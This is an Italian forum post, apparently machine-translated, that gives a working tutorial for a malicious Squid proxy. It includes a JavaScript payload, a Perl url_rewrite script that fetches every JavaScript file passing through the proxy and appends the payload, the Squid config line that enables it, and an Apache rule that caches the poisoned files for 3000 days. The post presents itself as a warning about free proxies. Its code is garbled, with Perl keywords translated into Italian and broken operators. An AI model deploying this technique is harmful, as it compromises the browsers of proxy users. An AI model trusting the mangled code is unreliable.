Questo post è stato modificato l'ultima volta da Mo Xiaowen il 7-6-2015 alle 23:19
Questo può essere fatto semplicemente modificando la configurazione di SQUID
Cos'è SQUID?
Squid è un software che memorizza nella cache i dati di Internet, riceve richieste di download dagli utenti ed elabora automaticamente i dati scaricati. Quando un utente vuole scaricare una homepage, può inviare una richiesta a Squid, chiedere a Squid di scaricarla per suo conto, poi Squid si collega al sito web e richiede la homepage, e infine invia la homepage all'utente mantenendo un backup; quando altri utenti fanno domanda per la stessa pagina, Squid invia immediatamente il backup salvato all'utente, così che l'utente percepisca che la velocità è piuttosto elevata. Squid può proxy protocolli come HTTP, FTP, GOPHER, SSL e WAIS, e Squid può gestirlo automaticamente, e puoi configurare Squid secondo le tue esigenze per filtrare le cose indesiderate.
Squid può funzionare in molti sistemi operativi, come AIX, Digital, UNIX, FreeBSD, hp-ux, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, ecc.
L'implementazione è molto semplice:
1. Installare Squid su un server Linux.
2. Modificare il codice del server, inserire un pezzo del nostro codice in tutto il javascrip trasmesso e inviarlo.
3. Imposta il tempo di cache del nostro file js modificato il più alto possibile.
Questo metodo vale anche per i siti web con SSL abilitato: se il sito carica una risorsa insicura (come jquery per un sito HTTP), la maggior parte dei browser darà un avviso, ma pochi prestano attenzione.
Chema ha detto che più di 5.000 persone hanno usato il suo proxy pochi giorni dopo il rilascio, e la maggior parte lo ha usato per fare cose sbagliate, perché usavano il proxy, quindi pensavano fosse anonimo e sicuro, ma non si aspettavano mai che anche il proxy avesse fatto cose sbagliate.
Crea il tuo server proxy malevolo
Se hai già un proxy server Squid, avrai bisogno anche di un server web come Apache.
Passo 1 Creare un carico utile
Uso uno script semplice come dimostrazione per indirizzare tutti i link ipertestuali al mio sito web.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Passo 2 Scrivi uno script per infettare tutti i file JS
/etc/squid/poison.pl
[mw_shl_code=perl,vero]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
mentre(<>)
{
mordere $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
stampa "http://127.0.0.1:80/tmp/$pid-$count.js";
}
altrimenti
{
stampa "$_";
}
$count++;
}[/mw_shl_code]
Questo script usa wget per ottenere il javascrip originale della pagina e rimuovere il file t, poi aggiungere il codice in /etc/squid/payload.js e inviare il file modificato al client, mentre devi creare la directory /var/www/tmp e permettere a squid di scrivere file al suo interno. Questa directory memorizza i file js modificati.
Passo 3: Combina lo script sopra con Squid
Aggiungilo in /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Passo 4: Fai in modo che la cache non fallisca mai
/var/www/tmp/.htaccess
[mw_shl_code=html,true] Scadenza Attivo
ScadenzaAccesso predefinito "accesso più 3000 giorni"[/mw_shl_code]
Questo dirà all'Apache di dargli un lungo tempo di scadenza finché l'utente non ripulisca la cache.
Se colleghi questo proxy, cliccando su qualsiasi collegamento ipertestuale ti reindirizzerai al mio sito web, e la cache esisterà anche se non userai il proxy in seguito. Ho semplicemente usato un payload non aggressivo e, con questo metodo, gli hacker possono fare molto di più. Quindi, ricordate a te stesso e agli amici di essere cauti nell'usare proxy gratuiti.
|
Pubblicato su 19/01/2015 02:34:56
|
|
|
|
Pubblicato su 19/01/2015 08:48:45
|
Padrone di casa|
Pubblicato su 20/01/2015 14:36:06
|
